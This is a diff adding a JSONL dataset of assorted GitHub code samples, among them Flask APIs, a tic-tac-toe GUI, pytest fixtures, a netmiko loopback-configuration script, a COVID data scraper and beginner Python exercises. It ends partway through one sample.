diff --git "a/1918.jsonl" "b/1918.jsonl" new file mode 100644--- /dev/null +++ "b/1918.jsonl" @@ -0,0 +1,1426 @@ +{"seq_id":"25727504796","text":"import os\nimport requests\nimport csv\nfrom io import StringIO\nfrom datetime import datetime\nfrom werkzeug.wrappers import Response\nfrom flask import Blueprint, render_template, request, redirect, url_for, flash\n\n\nPORT=os.environ.get('REST_SRV_PORT')\nsilences_blueprint = Blueprint('silences_blueprint', __name__)\n\n@silences_blueprint.route('/silences', methods=['GET'])\ndef get_silences():\n silences = requests.get('http://192.168.1.200:9093/api/v2/silences?silenced=false&inhibited=false&active=true').json()\n data_for_template = {\"metric\" : [], \"value\" : []}\n #for a in silences:\n # print(a[\"comment\"])\n # for d in a:\n # print(f\"{d['name']}, {d['value']}\")\n print(data_for_template)\n #return render_template('pos_dashboard.html', data_for_template=data_for_template, zip=zip)\n return render_template('silences.html', data=silences, datetime=datetime)\n\n@silences_blueprint.route('/silences/report/get', methods=['GET'])\ndef get_report():\n silences = requests.get('http://192.168.1.200:9093/api/v2/silences?silenced=false&inhibited=false&active=true').json()\n # stream the response as the data is generated\n response = Response(_generate_report(silences), mimetype='text/csv')\n # add a filename\n response.headers.set(\"Content-Disposition\", \"attachment\", filename=\"problems-report.csv\")\n return response\n\ndef _generate_report(input_data):\n data = StringIO()\n w = csv.writer(data)\n\n # write header\n w.writerow(('Назва магазину', 'Номер магазину', 'Номер каси', 'Адресса каси', 'Коментар', 'Створив', 'Початок проблеми', 'Очікувана дата закінчення', 'Тип проблеми'))\n yield data.getvalue()\n data.seek(0)\n data.truncate(0)\n\n # write each log item\n for item in input_data:\n shop_name = ''\n id_shop = ''\n id_pos = ''\n instance = ''\n alertname = ''\n\n for match in item[\"matchers\"]:\n if match[\"name\"] == \"shop_name\":\n shop_name = match[\"value\"]\n\n if match[\"name\"] == \"id_shop\":\n id_shop = match[\"value\"]\n\n if match[\"name\"] == \"id_pos\":\n id_pos = match[\"value\"]\n\n if match[\"name\"] == \"instance\":\n instance = match[\"value\"]\n\n if match[\"name\"] == \"alertname\":\n alertname = match[\"value\"]\n \n w.writerow((\n shop_name,\n id_shop,\n id_pos,\n instance,\n item[\"comment\"],\n item[\"createdBy\"],\n datetime.strptime(item[\"startsAt\"] , '%Y-%m-%dT%H:%M:%S.%fZ').strftime(\"%m/%d/%Y, %H:%M:%S\"),\n datetime.strptime(item[\"endsAt\"] , '%Y-%m-%dT%H:%M:%S.%fZ').strftime(\"%m/%d/%Y, %H:%M:%S\"),\n alertname\n #item[0],\n #item[1].isoformat() # format datetime as string\n\n ))\n yield data.getvalue()\n data.seek(0)\n data.truncate(0)","repo_name":"Daleiter/admin_fxpos","sub_path":"views/blueprint/silences/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"72605889970","text":"from Board import Board\r\nfrom tkinter import messagebox\r\nfrom Player import Player\r\n\r\nTEXT_BUTTONS_PROPERTY = \"text\"\r\nNUM_PLAYERS = 2\r\nMESSAGE_BOX_TITLE = \"TIC TAC TOE\"\r\nILLEGAL_MOVE_MSG = \"Illegal move !\"\r\nNUM_BUTTONS_TOTAL = 9\r\nNUM_BUTTONS_PER_ROW = 3\r\nNO_WIN_MSG = \"Game Over-No One Won\"\r\nFIRST_PLAYER_MARK = \"X\"\r\nSECOND_PLAYER_MARK = \"O\"\r\nGAME_OVER_MSG = \"Game Over, would you like to play again?\"\r\nFIRST_PLAYER_IND = 0\r\nSECOND_PLAYER_IND = 
1\r\n\r\n\r\nclass TicTacToeGame:\r\n \"\"\" manages a TicTacToe Game \"\"\"\r\n\r\n def __init__(self, game_board, player1, player2):\r\n self.board = game_board\r\n self.set_buttons_logic()\r\n self.players_arr = [player1, player2]\r\n self.cur_player = 0\r\n self.marked_buttons = 0\r\n self.winner = False\r\n self.start_player = 0\r\n\r\n def set_buttons_logic(self):\r\n \"\"\"sets the buttons logic\"\"\"\r\n buttons_arr = self.board.get_buttons_arr()\r\n for button in buttons_arr:\r\n button.config(command=lambda b=button: self.click(b))\r\n\r\n def click(self, button):\r\n \"\"\" the function that is going to be executed when the player clicks\r\n on a button \"\"\"\r\n if button[TEXT_BUTTONS_PROPERTY] == \"\":\r\n self.players_arr[self.cur_player].put_mark(button)\r\n self.marked_buttons += 1\r\n self.cur_player = (self.cur_player + 1) % NUM_PLAYERS\r\n else:\r\n # clicking on marked button\r\n messagebox.showerror(MESSAGE_BOX_TITLE, ILLEGAL_MOVE_MSG)\r\n\r\n self.check_winner()\r\n\r\n def check_winner(self):\r\n \"\"\" checks for a winner\"\"\"\r\n buttons_text_arr = self.board.get_buttons_text_arr()\r\n if self.check_row_win(buttons_text_arr) or \\\r\n self.check_col_win(buttons_text_arr) or \\\r\n self.check_diagonal_win(buttons_text_arr):\r\n self.end_game()\r\n else:\r\n # no one won\r\n if self.marked_buttons == NUM_BUTTONS_TOTAL and \\\r\n self.winner is False:\r\n messagebox.showinfo(MESSAGE_BOX_TITLE, NO_WIN_MSG)\r\n self.end_game()\r\n\r\n def check_row_win(self, lst):\r\n \"\"\" check if there is a row winner \"\"\"\r\n for i in range(0, NUM_BUTTONS_TOTAL, NUM_BUTTONS_PER_ROW):\r\n if lst[i] == lst[i + 1] == lst[i + 2] and lst[i] != \"\":\r\n self.winner = True\r\n messagebox.showinfo(MESSAGE_BOX_TITLE, \"Player \" + lst[i] +\r\n \" Won-Row\")\r\n if lst[i] == FIRST_PLAYER_MARK:\r\n self.players_arr[FIRST_PLAYER_IND].add_point()\r\n else:\r\n self.players_arr[SECOND_PLAYER_IND].add_point()\r\n return True\r\n\r\n def check_col_win(self, lst):\r\n \"\"\" check if there is a col winner \"\"\"\r\n for i in range(NUM_BUTTONS_PER_ROW):\r\n if lst[i] == lst[i + 3] == lst[i + 6] and lst[i] != \"\":\r\n self.winner = True\r\n messagebox.showinfo(MESSAGE_BOX_TITLE,\r\n \"Player \" + lst[i] + \" Won-Column\")\r\n if lst[i] == FIRST_PLAYER_MARK:\r\n self.players_arr[FIRST_PLAYER_IND].add_point()\r\n else:\r\n self.players_arr[SECOND_PLAYER_IND].add_point()\r\n return True\r\n\r\n def check_diagonal_win(self, lst):\r\n \"\"\" check if there is a diagonal winner \"\"\"\r\n if (lst[0] == lst[4] == lst[8]) and (lst[0] != \"\"):\r\n self.winner = True\r\n messagebox.showinfo(MESSAGE_BOX_TITLE, \"Player \" +\r\n lst[0] + \" Won-Diagonal\")\r\n if ((lst[0] == lst[4] == lst[8]) and (\r\n lst[0] == FIRST_PLAYER_MARK)):\r\n self.players_arr[FIRST_PLAYER_IND].add_point()\r\n else:\r\n self.players_arr[SECOND_PLAYER_IND].add_point()\r\n return True\r\n\r\n elif (lst[2] == lst[4] == lst[6]) and (lst[2] != \"\"):\r\n self.winner = True\r\n messagebox.showinfo(MESSAGE_BOX_TITLE, \"Player \" +\r\n lst[2] + \" Won-Diagonal\")\r\n if (lst[2] == lst[4] == lst[6]) and (lst[2] == FIRST_PLAYER_MARK):\r\n self.players_arr[FIRST_PLAYER_IND].add_point()\r\n else:\r\n self.players_arr[SECOND_PLAYER_IND].add_point()\r\n return True\r\n\r\n def end_game(self):\r\n \"\"\"handles the end of the game\"\"\"\r\n msg = messagebox.askyesno(MESSAGE_BOX_TITLE, GAME_OVER_MSG)\r\n if not msg:\r\n X_win = self.players_arr[FIRST_PLAYER_IND].get_player_score()\r\n O_win = 
self.players_arr[SECOND_PLAYER_IND].get_player_score()\r\n overall_win = \"\"\r\n if X_win == O_win:\r\n overall_win = \"tie\"\r\n elif X_win > O_win:\r\n overall_win = \"X\"\r\n else:\r\n overall_win = \"O\"\r\n\r\n messagebox.showinfo(MESSAGE_BOX_TITLE,\r\n \"Player X Won \" + str(X_win) + \" times\\n\"\r\n + \"Player O Won \" + str(O_win) + \" times\\n\" +\r\n \"Overall winner is: \" + overall_win)\r\n self.board.get_root().destroy()\r\n else:\r\n self.reset_game()\r\n self.play()\r\n\r\n def reset_game(self):\r\n \"\"\" resets the game board for a new game\"\"\"\r\n self.start_player = 1 - self.start_player\r\n if (\r\n self.cur_player != self.start_player): self.cur_player = self.start_player\r\n self.marked_buttons = 0\r\n self.winner = False\r\n self.board.reset_buttons()\r\n\r\n def play(self):\r\n \"\"\" this function starts the game\"\"\"\r\n self.board.play()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n board = Board()\r\n playerX = Player(FIRST_PLAYER_MARK)\r\n playerO = Player(SECOND_PLAYER_MARK)\r\n game = TicTacToeGame(board, playerX, playerO)\r\n game.play()\r\n","repo_name":"lioraVes/TicTacToe-GUI","sub_path":"TicTacToeGame.py","file_name":"TicTacToeGame.py","file_ext":"py","file_size_in_byte":5973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"5940523671","text":"from datetime import datetime\nfrom flask import jsonify, redirect\nfrom flask_openapi3 import OpenAPI, Info, Tag\nfrom flask_cors import CORS\nfrom model import Session, Tarefa, Categoria\nfrom schema.tarefa import TarefaDelPtrSchema, TarefaPtrSchema, TarefaSchema, TarefaListSchema, TarefaViewSchema\nfrom schema.categoria import CategoriaListSchema\nfrom schema.erro import ErroSchema\nfrom logger import logger\n\ninfo = Info(title=\"API - Gerenciador de Tarefas - MVP\", version=\"1.0.0\")\napp = OpenAPI(__name__, info=info)\nCORS(app)\n\n# definindo tags\nhome_tag = Tag(name=\"Documentação\", description=\"Seleção de documentação: Swagger, Redoc ou RapiDoc\")\ntarefa_tag = Tag(name=\"Tarefa\", description=\"Adição, visualização e remoção de tarefas\")\ncategoria_tag = Tag(name=\"Categoria\", description=\"Visualização de categorias\")\n\n\n@app.get('/', tags=[home_tag])\ndef home():\n \"\"\"Redireciona para /openapi, tela que permite a escolha do estilo de documentação.\n \"\"\"\n return redirect('/openapi')\n\n@app.post('/tarefa', tags=[tarefa_tag], responses={\"200\": TarefaViewSchema, \"400\": ErroSchema})\ndef adicionar_tarefa(form: TarefaSchema):\n \"\"\"Adiciona uma nova tarefa\n Retorna uma representação da tarefa.\n \"\"\" \n session = Session()\n try:\n tarefa = Tarefa(\n titulo=form.titulo,\n detalhes=form.detalhes,\n data_limite=datetime.strptime(form.data_limite, \"%d/%m/%Y\").date(),\n categoria_id=form.categoria_id\n )\n session.add(tarefa)\n session.commit()\n logger.debug(f\"Adicionando tarefa de titulo: '{tarefa.titulo}'\")\n return jsonify([{\n 'id': tarefa.id, \n 'titulo': tarefa.titulo,\n 'detalhes': tarefa.detalhes,\n 'data_limite': tarefa.data_limite.strftime('%d/%m/%Y'),\n 'categoria': {\n 'id': tarefa.categoria.id,\n 'nome': tarefa.categoria.nome\n } \n }]), 200 \n except Exception as e:\n session.rollback()\n logger.warning(f\"Erro requisição inválida '{tarefa.titulo}'\\n {str(e)}\")\n return {\"erro\": \"erro ao adicionar tarefa\"}, 400\n\n\n@app.get('/tarefa',tags=[tarefa_tag], responses={\"200\": TarefaListSchema, \"400\": ErroSchema})\ndef listar_tarefa(query: TarefaPtrSchema):\n \"\"\"Faz a busca por todas as tarefas ou 
filtra dependendo dos parametros passados\n Retorna uma representação da listagem de tarefas.\n \"\"\" \n session = Session()\n try:\n #filtro condicional por titulo, id da tarefa e por id da categoria\n filtros = []\n if query.titulo:\n filtros.append(Tarefa.titulo.ilike(f'%{query.titulo}%'))\n elif query.id:\n filtros.append(Tarefa.id==query.id) \n elif query.categoria_id:\n filtros.append(Tarefa.categoria_id==query.categoria_id) \n\n #busca as tarefas no BD utilizando os filtros, se informados \n tarefas = session.query(Tarefa).filter(*filtros).all() \n\n return jsonify([{\n 'id': tarefa.id, \n 'titulo': tarefa.titulo,\n 'detalhes': tarefa.detalhes,\n 'data_limite': tarefa.data_limite.strftime('%d/%m/%Y'),\n 'categoria': {\n 'id': tarefa.categoria.id,\n 'nome': tarefa.categoria.nome\n }\n } for tarefa in tarefas]), 200 \n except Exception as e:\n logger.warning(f\"Erro ao buscar tarefas\\n {str(e)}\")\n return {\"erro\": \"erro ao buscar tarefas\"}, 400\n \n@app.get('/categoria', tags=[categoria_tag], responses={\"200\": CategoriaListSchema, \"400\": ErroSchema})\ndef listar_categorias():\n \"\"\"Faz a busca por todas as categorias cadastradas\n Retorna uma representação da listagem de categorias.\n \"\"\" \n session = Session()\n try:\n return jsonify([\n {\n 'id': categoria.id,\n 'nome': categoria.nome,\n } for categoria in session.query(Categoria).all()\n ]), 200 \n except Exception as e:\n logger.warning(f\"Erro ao buscar categorias\\n {str(e)}\")\n return {\"erro\": \"erro ao buscar categorias\"}, 400 \n\n\n@app.delete('/tarefa', tags=[tarefa_tag], responses={\"200\": TarefaViewSchema, \"400\": ErroSchema})\ndef deletar_tarefa(query: TarefaDelPtrSchema):\n \"\"\"Deleta uma Tarefa a partir do id da tarefa\n Retorna uma representação da Tarefa deletada.\n \"\"\" \n session = Session()\n try:\n tarefa = session.query(Tarefa).get(query.id)\n if tarefa:\n json = jsonify([{\n 'id': tarefa.id, \n 'titulo': tarefa.titulo,\n 'detalhes': tarefa.detalhes,\n 'data_limite': tarefa.data_limite.strftime('%d/%m/%Y'),\n 'categoria': {\n 'id': tarefa.categoria.id,\n 'nome': tarefa.categoria.nome\n }\n }])\n session.query(Tarefa).filter(Tarefa.id == query.id).delete()\n session.commit() \n return json, 200\n else:\n return {\"erro\":\"tarefa não encontrada\"}, 400\n except Exception as e:\n session.rollback()\n logger.warning(f\"Erro ao buscar tarefa\\n {str(e)}\")\n return {\"erro\": \"erro ao buscar tarefa\"}, 400","repo_name":"bpbastos/backend-python-basico","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5345,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"3949192079","text":"from collections import deque\r\n\r\ns = int(input())\r\n\r\nq = deque()\r\n# 이모티콘 1개 클립 이모티콘 0개\r\nq.append((1,0))\r\n\r\n# visited[i][j] -> i개번째에 j개의 클립 만드는 시간\r\nvisited = [[0] * 1001 for _ in range(1001)]\r\n\r\nwhile q:\r\n i, clip = q.popleft()\r\n # 목표개수에 도달하면\r\n if i == s:\r\n print(visited[i][clip])\r\n break\r\n\r\n # 현재 이모티콘 복사하기\r\n if visited[i][i] == 0:\r\n # clip을 i개로 복사했으니까 1초 더해준다\r\n visited[i][i] = visited[i][clip] + 1\r\n # 이모티콘 i개 클립 i개 q에 저장\r\n q.append((i,i))\r\n\r\n # 다음은 현재 이모티콘에서 클립만큼 더하거나 1개를 뺀다\r\n for next in (i+clip, i-1):\r\n # 방문한적없고 구역 내 이면\r\n if 2 <= next < 1001 and visited[next][clip] == 0:\r\n visited[next][clip] = visited[i][clip] + 1\r\n q.append((next,clip))","repo_name":"wns0394/BaekJoon","sub_path":"백준/Gold/14226. 
이모티콘/이모티콘.py","file_name":"이모티콘.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"72053911090","text":"import pytest\n\nfrom pages.battleship_v3.models import Player\n\n\n@pytest.fixture\ndef battleship_v3(request):\n return request.param()\n\n\n@pytest.fixture\ndef player1():\n\n return Player(id=1, name=\"Player 1\")\n\n\n@pytest.fixture\ndef player2():\n\n return Player(id=2, name=\"Player 2\")\n\n\n@pytest.fixture\ndef game(player1, player2, battleship_v3):\n game_id = battleship_v3.create_game([player1.id, player2.id])\n return battleship_v3.get_game(game_id)\n\n\nimport pytest\n\nfrom pages.battleship_v3.models import Direction, ShipPlacement, ShipType\n\n\n@pytest.fixture\ndef place_all_ships(battleship_v3, player1, player2, game):\n ship_placements = [\n (ShipType.CARRIER, \"A\", 1),\n (ShipType.BATTLESHIP, \"C\", 1),\n (ShipType.CRUISER, \"E\", 1),\n (ShipType.SUBMARINE, \"G\", 1),\n (ShipType.DESTROYER, \"I\", 1),\n ]\n\n for ship_type, start_column, start_row in ship_placements:\n placement1 = ShipPlacement(\n game_id=game.id,\n ship_type=ship_type,\n start_row=start_row,\n start_column=start_column,\n direction=Direction.HORIZONTAL,\n )\n battleship_v3.create_ship_placement(game.id, player1.id, placement1)\n\n placement2 = ShipPlacement(\n game_id=game.id,\n ship_type=ship_type,\n start_row=start_row,\n start_column=start_column,\n direction=Direction.HORIZONTAL,\n )\n battleship_v3.create_ship_placement(game.id, player2.id, placement2)\n\n return True\n","repo_name":"Significant-Gravitas/opensoft","sub_path":"deprecated/battleship_v3/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"70013987570","text":"import os\nfrom utils import convertTime, lenVideo, isVideo\n\npath = input('Enter the absolute path to your videos folder - ')\npath = fr'{path}'.format(path=path)\n\n\nos.chdir(path=path)\nseconds = 0\n\n\nfiles = os.listdir()\n\nfor file in files:\n absolute_path = os.path.join(os.getcwd(), file)\n seconds += lenVideo(path=absolute_path)\n\nspeeds = [1, 1.25, 1.5, 1.75, 2, 2.5, 2.7, 3, 3.25, 3.5]\n\nfor speed in speeds:\n seconds /= speed\n print(\n f\"\\nTime required at a speed of {speed}x - {convertTime(seconds=seconds)}\")\n seconds *= speed\n","repo_name":"guptaharsh13/personal-automation","sub_path":"single_folder.py","file_name":"single_folder.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"40621200716","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport aurespf.solvers as au\nfrom nhgrid import nh_Nodes\n\n\"\"\" This file looks for incidents in the small network,\n EU + first neighbors where for a region the balancing\n energy is bigger for the unconstrained the the constrained case.\n Look in the ./results/figures/CheckStrangeBE/ folder for results.\n\n \"\"\"\n\nregions = ['EU', 'RU', 'NA', 'ME']\n\nNcopper = nh_Nodes(load_filename=\"EU_RU_NA_ME_aHE_copper_sqr.npz\")\nNconstrained = nh_Nodes(load_filename=\"EU_RU_NA_ME_aHE_0.6q99_sqr.npz\")\ncopper_flows = np.load(\"./results/EU_RU_NA_ME_aHE_copper_sqr_flows.npy\")\nconstr_flows = np.load(\"./results/EU_RU_NA_ME_aHE_0.6q99_sqr_flows.npy\")\n\nlinklist = [au.AtoKh(Ncopper)[-1][i][0] \\\n for i in 
range(len(au.AtoKh(Ncopper)[-1]))]\nprint(linklist)\n\ndef analyze_incident(hour):\n mismatch = {}\n copper_injection = {}\n constr_injection = {}\n copper_flow_dict = {}\n constr_flow_dict = {}\n for i in xrange(4):\n mismatch[regions[i]] = Ncopper[i].mismatch[hour]\n copper_injection[regions[i]] = mismatch[regions[i]]\\\n - Ncopper[i].curtailment[hour]\\\n + Ncopper[i].balancing[hour]\n constr_injection[regions[i]] = mismatch[regions[i]]\\\n - Nconstrained[i].curtailment[hour]\\\n + Nconstrained[i].balancing[hour]\n\n constr_link_capacities = 0.6*au.get_quant_caps(\\\n filename=\"./results/EU_RU_NA_ME_aHE_copper_sqr_flows.npy\")\n constr_link_cap_dict = {}\n for j in xrange(len(linklist)):\n copper_flow_dict[linklist[j]] = copper_flows[j][hour]\n constr_flow_dict[linklist[j]] = constr_flows[j][hour]\n constr_link_cap_dict[linklist[j]] = [constr_link_capacities[2*j], \\\n constr_link_capacities[2*j+1]]\n\n\n print(np.sum(copper_injection.values()))\n print(np.sum(constr_injection.values()))\n\n return mismatch, copper_injection, constr_injection, copper_flow_dict,\\\n constr_flow_dict, constr_link_cap_dict\n\ndef get_bal_at_hour(copper_nodes, constr_nodes, hour, region='ME'):\n mean_load = copper_nodes[regions.index(region)].mean\n copper_bal = copper_nodes[regions.index(region)].balancing[hour]/mean_load\n constr_bal = constr_nodes[regions.index(region)].balancing[hour]/mean_load\n\n return [copper_bal, constr_bal]\n\n\ndef find_incidents(copper_nodes=Ncopper, constr_nodes=Nconstrained):\n successes = 0\n N = 280512\n hours_of_interest = []\n for h in xrange(N):\n copper_bal = get_bal_at_hour(Ncopper, Nconstrained, hour=h, region='ME')[0]\n constr_bal = get_bal_at_hour(Ncopper, Nconstrained, hour=h, region='ME')[1]\n\n if ((copper_bal - constr_bal)/copper_bal > 1e-4) and \\\n copper_bal > 1e-6:\n successes = successes + 1\n print(copper_bal, constr_bal, h)\n hours_of_interest.append(h)\n\n\n print('Successrate: ', float(successes)/N)\n\n plt.ion()\n plt.plot(Ncopper[3].balancing/Ncopper[3].mean, label='copper')\n plt.plot(Nconstrained[3].balancing/Nconstrained[3].mean, label='constrained')\n plt.title('ME, normalized balancing energy')\n plt.legend()\n plt.xlabel('Hour')\n plt.ylabel('Balancing [normalized]')\n\n return hours_of_interest\n","repo_name":"asadashfaq/eurasia_grid","sub_path":"find_strange_BE.py","file_name":"find_strange_BE.py","file_ext":"py","file_size_in_byte":3388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"4005827424","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Nov 27 20:02:05 2021\n\n@author: arcji\n\"\"\"\n\n\"\"\"\nString opeartors \nLearning guide\n\n\"\"\"\n# make a string \na='xxx'\nb='yyy'\n# append a string\nprint(a+b)\n\n# upper or lower cases\nb.lower()\nb.upper()\n\n# show the escape of a string\nc='i HEART \\'SSS\\'' \n\n# remove character of a characters \nc.strip(\"'\")\n\n# replace a characters\nc.replace('S','DD')\n\n#split a string to list\nc.split(\" \")\n\n#join a list to a string\nd=['222','232131','2131231321']\n\nt=(\":\").join(d)\n\nt\n\n\"\"\"\nList operators\n###########\n\"\"\"\n\na=[1,2,3,4]\nb=[2,324,235]\n\n#combine 2 list \nc=a+b\n\n\n#select top 5 elemets\nprint(c[0:5])\n\n#select last 2 elements\nprint(c[-2:])\n#select all but last 2 elements\nprint(c[:-2])\n\n#add new elements\nc.append([2,2,3])\n\n#remove element\nc.pop() #remove last one\n\nc.pop(2) # remove the xth element\n\nc.remove(1) \n\n# count occurence of an element\nc.count(2)\n\n#sort 
\nsorted(c,reverse=True )\n\n# use range to create dummy data\n\nx=list(range(9))\nx\n\n\n\nfor i in x:\n print(x)\n \nfor l,i in enumerate(x):\n print (l,i)\n\n\n\"\"\"\nDictionary\n###########\n\"\"\"\n\nd={}\nd['qqw']=1\nd['qqwxx']=2\n\n# change vlaues o a key\n\nd['qqw']='tt'\n\nd.keys()\nd.values()\n\n#for loop iterates \n\nfor key,value in d.items():\n print(key,value)\n \n\"word count \"\n\ntxt='i lsio i sliol w,e abadio'\n\nlxx=txt.split(\" \")\n\n\ncounter={}\n\nfor t in lxx: \n if t in counter:\n counter[t]+=1\n else:\n counter[t]=1\n \n","repo_name":"50CENTSJAY/50CENTSJAY","sub_path":"Pandas_data vis_list_dict/List and dictionary.py","file_name":"List and dictionary.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"35138827389","text":"from utils import *\nimport matplotlib.pyplot as plt\nseg = fingernailseg()\nprint('create_unet')\nseg.create_unet()\nseg.load_model()\nprint('predicting')\n\nmask = seg.predict()\nraw = seg.X_test\nfor i in range(0,seg.X_test.__len__()):\n plt.figure(figsize=(5,5))\n rand_image = i\n plt.imshow(raw[rand_image,:,:,:])\n plt.imshow(mask[rand_image,:,:,0], alpha=0.8)\n #plt.title('Fingernails segmentation of test image', fontsize=15)\n filename = str(rand_image)+'.png'\n plt.savefig(filename)\n print('saved',filename)\nprint('done')\n","repo_name":"decebel/keras-unet","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"20"} +{"seq_id":"13265856354","text":"import re\nfrom netmiko import ConnectHandler\n\ndef getDataFromDevice(params, command):\n \"\"\"Send command to device and return the result\"\"\"\n with ConnectHandler(**params) as ssh:\n result = ssh.send_command(command)\n return result\n\ndef checkForInterface(params, interfaceName):\n \"\"\"Check if interface exists, return True if it does\"\"\"\n return getDataFromDevice(params, f\"sh ip int br | include {interfaceName}\") != \"\"\n\ndef getInterfaceIP(params, interfaceName):\n \"\"\"Get ip address of interface\"\"\"\n command = f\"sh ip int {interfaceName} | include Internet address\"\n result = getDataFromDevice(params, command)\n ipAddr = re.search(\"\\d+\\.\\d+\\.\\d+\\.\\d+\", result).group()\n subnetMask = re.search(\"/\\d+$\", result).group()\n return (ipAddr, subnetMask)\n\ndef createLoopback(params, loopbackNumber, ipAddr, subnetMask):\n \"\"\"Create loopback interface with loopbackNumber\"\"\"\n interfaceExists = checkForInterface(params, f\"Loopback{loopbackNumber}\")\n if interfaceExists:\n interfaceAddr = getInterfaceIP(params, f\"Loopback{loopbackNumber}\")\n integerForm = \"/\" + str(sum([bin(int(i)).count(\"1\") for i in subnetMask.split(\".\")]))\n if interfaceAddr[0] != ipAddr or interfaceAddr[1] != integerForm:\n deleteLoopback(params, loopbackNumber)\n interfaceExists = False\n if not interfaceExists:\n with ConnectHandler(**params) as ssh:\n ssh.send_config_set([f\"int loop {loopbackNumber}\", f\"ip addr {ipAddr} {subnetMask}\"])\n return f\"Loopback{loopbackNumber} created\"\n return f\"Loopback{loopbackNumber} already exists\"\n\n\ndef deleteLoopback(params, loopbackNumber):\n \"\"\"Delete loopback interface with loopbackNumber\"\"\"\n interfaceExists = checkForInterface(params, f\"Loopback{loopbackNumber}\")\n if interfaceExists:\n with ConnectHandler(**params) as ssh:\n ssh.send_config_set([f\"no int loop {loopbackNumber}\"])\n 
return f\"Loopback{loopbackNumber} deleted\"\n return f\"Loopback{loopbackNumber} does not exist\"\n\n \nif __name__ == '__main__':\n device_ip = \"10.0.15.103\"\n username = \"admin\"\n password = \"cisco\"\n\n device_params = {\"device_type\": \"cisco_ios\",\n \"ip\": device_ip,\n \"username\": username,\n \"password\": password\n }\n\n result = createLoopback(device_params, 62070088, \"192.168.1.1\", \"255.255.255.0\")\n #result = deleteLoopback(device_params, 62070088)\n print(result)\n","repo_name":"Hanon088/NPA2021-Final","sub_path":"62070088-netmiko.py","file_name":"62070088-netmiko.py","file_ext":"py","file_size_in_byte":2496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"31959449314","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Apr 20 14:43:23 2020\r\n\r\n@author: haldf\r\n\"\"\"\r\n\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nimport numpy as np\r\nimport pandas as pd\r\nimport pickle\r\n\r\nprint('0')\r\n\r\nURL = 'https://en.wikipedia.org/wiki/List_of_states_and_territories_of_the_United_States_by_population'\r\npage = requests.get(URL)\r\nsoup = BeautifulSoup(page.content, 'html.parser')\r\ntable = soup.find_all('table')[0] \r\nstates = pd.read_html(str(table))[0]\r\nstates = states.iloc[0:,[2,3]]\r\nstates.columns = [\"State\",\"Population\"]\r\nstates = states.iloc[0:np.where(states.State ==\"Contiguous United States\")[0][0]]\r\n\r\nprint('1')\r\n\r\ncovid_states = {}\r\ninfection_time = 10\r\n\r\nfor i in states['State']:\r\n URL = 'https://covidtracking.com/data/state/'+ i.replace(\" \",\"-\").replace(\".\",\"\") +'#historical' \r\n page = requests.get(URL)\r\n soup = BeautifulSoup(page.content, 'html.parser')\r\n table = soup.find_all('table')[1] \r\n df = pd.read_html(str(table))[0]\r\n df = df.iloc[np.arange(df.shape[0]-1,0,-1),0:]\r\n df[\"Date\"] = df[\"Date\"].str[4:]\r\n active = df['Positive']\r\n n = df['Positive'].shape[0]\r\n recovered = np.zeros(n)\r\n recovered[infection_time:] = df['Positive'][0:(n-infection_time)]\r\n df[\"Active\"] = active - recovered\r\n df['Recovered'] = recovered\r\n print(i)\r\n covid_states[i] = df\r\n \r\npickle.dump(states,open('states','wb'))\r\npickle.dump(covid_states,open('covid_states','wb'))\r\n","repo_name":"AndrewZastovnik/AZCov","sub_path":"Load_data.py","file_name":"Load_data.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"12860777322","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Feb 1 15:53:21 2021\r\n\r\n@author: asus\r\n\"\"\"\r\n\r\n\r\n\"\"\"\r\n1)\r\nCreate a list \r\nSwap the second half of the list with the first half of the list \r\nPrint this list on the screen\r\n\r\n\"\"\"\r\n\r\nmy_list = list(range(10)) # create a list which has 10 elements \r\n\r\nx = my_list[:5] # hold the first half element of the list in a variable called x \r\n\r\nmy_list[:5] = my_list[5:] # replace the first half with the last half of the list\r\n\r\nmy_list[5:] = x # replace the last half element with x which is the value of first half at the beginning\r\n\r\nprint(my_list) # print the list\r\n\r\n\"\"\"\r\n2)\r\nAsk the user to input a single digit integer to a variable 'n'\r\nPrint out all of the even numbers from 0 to n (including n)\r\n\r\n\"\"\"\r\n\r\nn = int(input(\"Please enter a single digit integer: \")) #the user inputs the integer number\r\n\r\nwhile n<0 or n>=10 : # while the entered number is not single digit 
